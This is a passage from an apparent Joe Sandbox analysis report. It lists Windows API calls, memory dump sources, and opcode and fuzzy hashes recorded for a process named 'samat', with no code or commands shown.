                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e9ade2ef335731114cf6dcd232dc74199ce15689346e746a6c7639da1021e9a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D06712B0874642EF553B709C5727892596F48711B94543AD80B4A393DDBDA8494263
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                                      • Instruction ID: f0755f2c32e9bafdd37f79b70449d6df1b209dd39095ff0845914522cdaa6ba7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3512E23B0924186E764BA35DC0677EE198BF44BA4F944B32DD6D0B7E5CEBCD4018626
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                      • Instruction ID: ca4881f2439b6a0db14825e5b2976e72329e4b77d3a2dc183c218889a977bddc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E911E222708A9281DB20AB25EC01269E365BB41FF4F944336EE7D077D8CEBCD0508701
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                                                                      • Opcode ID: be3047ffbf8d3a3382a60741f12f29956a7e97552a5b0cf3e5d2d3eb3c06d507
                                                                                                                                                                                                                                                                                      • Instruction ID: afc1c5ad39d51ceafcc808669550a8815489537479c09b5d1d52ae8f27d839a7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be3047ffbf8d3a3382a60741f12f29956a7e97552a5b0cf3e5d2d3eb3c06d507
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED05E94B1E70181EE64675EBA9027A1252AF4CFC1F881034DF1E4B799EE1CE492C70C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABC6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABD0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                      • Instruction ID: f9f5ac7ec8eeb59d3cce01a8abfe12ee8a06950ccdb5c6ab72f0f5f70853a75d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221F612F0C68201FBA47751DC42779928A9F947A0F88463BD92E477C5DEFCE4814322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                      • Instruction ID: 881fb8897f6d56f25c0c034f21346f752949e835b6a4b3ffb2e7b9e118edaf5b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1419933A1824587EB34AA15E952379B3A4FB56751F900132E68E436D1CFBEE442CB62
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eab84e70d576b7cd09f87498ce6b6c6cd9351fe1a4fe93539c16e11a3eadb65b
                                                                                                                                                                                                                                                                                      • Instruction ID: dd3463ab9541b6d61e452bc038bc0066947e0b485bf43a05d708a65165750640
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab84e70d576b7cd09f87498ce6b6c6cd9351fe1a4fe93539c16e11a3eadb65b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0521A621B1865146FB50BB22AD063BAD659BF45BC4FC98432EF0D0B786CEBDE081C312
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                                                                      • Instruction ID: 979095f411f82d72718147561d2a045645e09917d5c878a80302cb4a388fb3c5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64315B23F1868286E7117B55CC523BCA698BB91B95FD20137E95D037D2CEFDA4418723
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                      • Instruction ID: 53ddbee1291033f0ee23eb03d7878ce34820801dea9375483bd762868ae6f660
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08217E72B0474689EF14AF68C8813EC73A8EB04718F844637E75E07A85DFB8E545C752
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                      • Instruction ID: bc2227f15ee0209f2fbec602c53c91e3ccf383f44c715bb52245c600c7a9a5c0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93113363B1864146EB60BF21D802379E278AF95B84F944433EA8C57A95CFFDE4004762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                      • Instruction ID: d0648260a8084942889e47fd337e45bb410f4b071db79b1c47053612288ed481
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2212932B08A8187DB62AF18D842379B3A4FB84F54F948236EB6D876D5DF7CD4008B11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                      • Instruction ID: 0946c83fcadbf284fe5f66d71f94e3fac3bae1d626e9de2e6949069bcac39978
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C018262B0874141EB04AF62DD0266DE6A9EF95FE0F884A32DE5C57BE6CEBCD4014316
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00007FF7E12C6476,?,00007FF7E12C336E), ref: 00007FF7E12C8EA2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2592636585-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                                                      • Instruction ID: 2461bc034c021b5a109fd00357da4c6955ce84c740a2b2d4d4c4cf578db1c639
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD08C01F3428646EF44B767BA4B7299255AB89BC0F88D036EE4D03B5ADC3DD0418B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 28aa62da7c2b343be502b308ef65a68d306ba655c8ab5602ffdcf5a4e2c32b8f
                                                                                                                                                                                                                                                                                      • Instruction ID: cf62e3219355823b4e59e3c5c008163b2e9e0cd074f2bc4e632174136f56a839
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28aa62da7c2b343be502b308ef65a68d306ba655c8ab5602ffdcf5a4e2c32b8f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB118C32615B8596DB14DF59E4401ADB3A9FF84BC0B484236EF9D43B68EF38E162C744
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF7E12DB32A,?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A), ref: 00007FF7E12DEBED
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ef74b484ef9c1ed0a7ced0d4a83893371043d47036ea417e5906fc1f7edcc34
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF03756B0960241FF597665DC573B982986F98B80F888532C90F862D1EDBCB4818232
